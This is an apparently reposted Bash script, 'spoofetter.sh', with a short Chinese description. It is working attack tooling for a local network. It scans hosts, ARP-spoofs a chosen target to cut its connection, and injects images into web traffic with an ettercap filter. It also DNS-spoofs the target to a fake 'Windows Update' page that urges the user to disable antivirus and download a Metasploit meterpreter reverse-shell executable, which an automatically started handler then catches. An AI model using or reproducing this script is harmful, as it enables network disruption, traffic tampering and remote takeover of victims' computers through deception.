spoofetter.sh Version 0.1

来源：互联网发布：臀部脂肪堆积知乎编辑：程序博客网时间：2024/05/21 13:58
#!/bin/bash#Author: Qingzheng #2012-11-11#spoofetter.sh Version 0.1#Email:qingzheng.2008@163.comfunction Usage(){        echo -e "$red####################################################$white"        echo -e "$red#             ${purple}spoofetter.sh                        $red#$white"        echo -e "$red#             ${purple}Author:Qingzheng                     $red#$white"        echo -e "$red####################################################$white"}function Ettercap_config(){echo -e "[$blue>$white] Start IPv4 Forward"        echo '1' >/proc/sys/net/ipv4/ip_forwardecho -e "[$blue>$white] Change etter.conf"        grep "iptables -t" /etc/etter.conf | sed -i 's/#//g' /etc/etter.confecho -e "[$blue>$white] Start apache"         /etc/init.d/apache2 start &>/dev/null        echo -e "[$blue>$white] Ettercap configure DONE!"}function Listening(){echo -e "[$blue>$white] Make payload /var/www/Windows-KB655723-x86-ENU.exe"msfpayload windows/meterpreter/reverse_tcp LHOST=$localhost LPORT=3421 R | msfencode -t exe -e x86/shikata_ga_nai -c 10 -o /var/www/Windows-KB655723-x86-ENU.exe        echo -en "use exploit/multi/handler\nset PAYLOAD windows/meterpreter/reverse_tcp\nset LHOST $localhost\nset LPORT 3421\nexploit\n" >$(pwd)/tmp/listening.rcecho -e "[$blue>$white] Start Listening..."xterm -hold -geometry 80x15+0+0 -e "msfconsole -r $(pwd)/tmp/listening.rc" &echo -en "[$blue+$white] Time [ "t="15"for h in `seq $t`;do  let p=$t-$h  echo -n "="  for i in `seq 25`; do        if [ "$p" -ge "10" ]; then                sleep 0.01                echo -en "|$p\b\b\b"                sleep 0.01                echo -en "/$p\b\b\b"                sleep 0.01                echo -en "-$p\b\b\b"                sleep 0.01                echo -en "\\\\$p\b\b\b"        else                sleep 0.01                echo -en "|$p\b\b"                sleep 0.01                echo -en "/$p\b\b"                sleep 0.01                      echo -en "-$p\b\b"                sleep 0.01                echo -en "\\\\$p\b\b"        fi    donedoneecho " ]"}function ARPSpoofAttack(){for ((i=0;i<=19;i++));doecho -e "[$blue>$white] Run ARP_Spoof_Attack...processes $i"arpspoof -i $interface -t $gateway $dsthost &>/dev/null &doneecho -e "[$blue>$white] Run ARP_Spoof_Attack...processes $i"arpspoof -i $interface -t $gateway $dsthost}function ReplanceBrowseImg(){echo -e "[$blue>$white] Copy $(pwd) /var/www"if [ -e $(pwd)/tmp/replancebrowseimg.jpg ]; thencp -rf $(pwd)/tmp/replancebrowseimg.jpg /var/wwwelseecho -e "[$blue>$white] No founding $(pwd)/tmp/replancebrowseimg.jpg"exitfiecho -e "[$blue>$white] Create file replancebrowseimg.src!"        echo "# This is ettercap scriptif (ip.proto == TCP && tcp.dst == 80) {        if (search(DATA.data, \"Accept-Encoding\")) {                replace(\"Accept-Encoding\", \"Accept-Mousecat\");                msg(\"zapped Accept-Encoding!\n\");        }}if (ip.proto == TCP && tcp.src == 80) {        replace(\"img src=\", \"img src=\"http://$localhost/replancebrowseimg.jpg\" \");        replace(\"IMG SRC=\", \"img src=\"http://$localhost/replancebrowseimg.jpg\" \");        msg(\"Filter Ran.\n\");}" >$(pwd)/tmp/replancebrowseimg.src        echo -e "`etterfilter $(pwd)/tmp/replancebrowseimg.src -o $(pwd)/tmp/replancebrowseimg.ef | grep -v "^$" | tail -n5 | sed 's/^/[\\\e[01;32m>\\\e[00m]/g'`"        echo -e "[$blue>$white] Compile replancebrowseimg.src DONE!"        echo -e "[$blue>$white] Img path http://$localhost/replancebrowseimg.jpg"        echo -e "[$blue>$white] Run Replance_Browse_Img ..."        ettercap -i $interface -T -q -F $(pwd)/tmp/replancebrowseimg.ef -M arp:remote // /$dsthost/ | sed 's/^/[+] /g'}function DNSSpoofAttack(){echo "<!-- evil html --><!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/1999/REC-html1401-19991224/strict.dtd\"><html><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" /><title>Windows Update</title><style type=\"text/css\">.style2{        font-family:Arial, Helvetica, scans-serif;        font-weight:bold;        font-size:14px;        color:#999999;}.style3{        font-family:Arial, Helvetica, scans-serif;        font-weight:bold;        font-size:10px;        color:#999999;}</style></head><body><script type=\"text/javascript\">        setInterval(\"webjx.innerHTML=new Date().toLocaleString();\",1000);        document.write(\"Browser name: \"+navigator.appName+\"<hr />\")</script><p align=\"center\" class=\"style2\">High-risk vulnerabilities detected browser<br />Tip: turn off anti-virus software</p><p align=\"center\"><input align=\"center\" type=\"button\" name=\"Button\" value=\"Download Update\" onClick=\"window.open('/Windows-KB655723-x86-ENU.exe','download'); return false;\"></p><br /><div align=\"center\" id=\"webjx\" class=\"style3\"></div></body></html>" >/var/www/index.htmlListeningif [ ! -e "/usr/local/share/ettercap/etter.dns.old" ]; thenif [ -e /usr/local/share/ettercap/etter.dns ]; thenmv /usr/local/share/ettercap/etter.dns /usr/local/share/ettercap/etter.dns.oldecho -e "[$blue>$white] Backup etter.dns.old"elseecho -e "[$blue>$white] No founding /usr/local/share/ettercap/etter.dns"echo -e "[$blue>$white] Create new file /usr/local/share/ettercap/etter.dns"touch /usr/local/share/ettercap/etter.dnsfi        else                echo -e "[$blue>$white] Alredy backup etter.dns.old"        fiecho -e "[$blue>$white] Change etter.dns"        echo "* A $localhost" >/usr/local/share/ettercap/etter.dns        echo -e "[$blue>$white] Run DNS_Spoof_Attack..."        xterm -geometry 80x15+0+230 -e "ettercap -i $interface -T -q -P dns_spoof -M arp:remote // /$dsthost/" &}##########################################################################           Main         #################################################################################################function Main(){blue="\e[01;34m"red="\e[00;31m"green="\e[00;32m"purple="\e[00;35m"white="\e[00m"underline="\\033[4m"while [ True ]; doUsageallinterface=`ifconfig | grep "Link encap" | awk '{print $1}' | grep -v "lo" | grep -n "" | sed 's/^/[/g' | sed 's/:/]: /g'`        echo -e "$purple${allinterface}$white"echo -en "${underline}Interface$white:$blue>>$white "read numinterfaceinterface=`echo "$allinterface" | grep "\[$numinterface\]" | cut -d' ' -f2`localhost=`ifconfig $interface | grep "inet addr" | grep -v "127.0.0.1" | cut -d':' -f2 | awk '{print $1}'`gateway=`route -n | grep "UG" | awk '{print $2}' | uniq`        echo -e "[$blue>$white] Local IP: $green${localhost}$white"echo -e "[$blue>$white] Gateway:  $green${gateway}$white"echo -e "[$blue>$white] Online Host!!"a=`nmap -T4 -sn -n $localhost/24`scanhost=`echo "$a" | grep "Nmap scan" | cut -d' ' -f5 | grep -v "$localhost" | grep -n "" | sed -e 's/^/[/g' -e 's/:/]: /g'`b=`echo "$a" | grep "MAC Address:" | awk 'FS=" " {print $3 $4 $5 $6 $7 $8 $9}'`c=`echo "$scanhost" | wc -l`for ((i=1;i<$c+1;i++));doif [ $i%2==1 ]; then                u=$(echo -en "`echo "$scanhost" | sed -n ${i}p`\t" && echo "$b" | sed -n ${i}p)echo -e "$purple${u}$white"        else                v=$(echo -en "`echo "$scanhost" | sed -n ${i}p`\t" && echo "$b" | sed -n ${i}p)                echo -e "$purple${v}$white"        fidoneecho -en "${underline}Dstination host$white:$blue>>$white "read numdsthostdsthost=`echo "$scanhost" | grep "\[$numdsthost\]" | cut -d' ' -f2`Attoption=`echo -e "ARP_Spoof_Attack\nReplance_Browse_Img\nDNS_Spoof_Attack" | grep -n "" | sed -e 's/^/[/g' -e 's/:/]: /g'`echo -e "${purple}$Attoption${white}"echo -en "${underline}Attack Option${white}:$blue>>$white "read numattackattackoption=`echo "$Attoption" | grep "\[$numattack\]" | cut -d' ' -f2`Ettercap_configcase $attackoption in                        "ARP_Spoof_Attack")                                ARPSpoofAttack                        ;;                        "Replance_Browse_Img")                                ReplanceBrowseImg                        ;;                        "DNS_Spoof_Attack")                                DNSSpoofAttack                        ;;                esac                echodone}Main
这个脚本有第一个功能arp欺骗断网攻击,第二个照片替换,不过经测试这个替换效果不好,过滤规则也没大写好,最后一个就是arp dns欺骗,并伪造成升级网页,诱骗用户下载双击exe文件,反弹一个shell.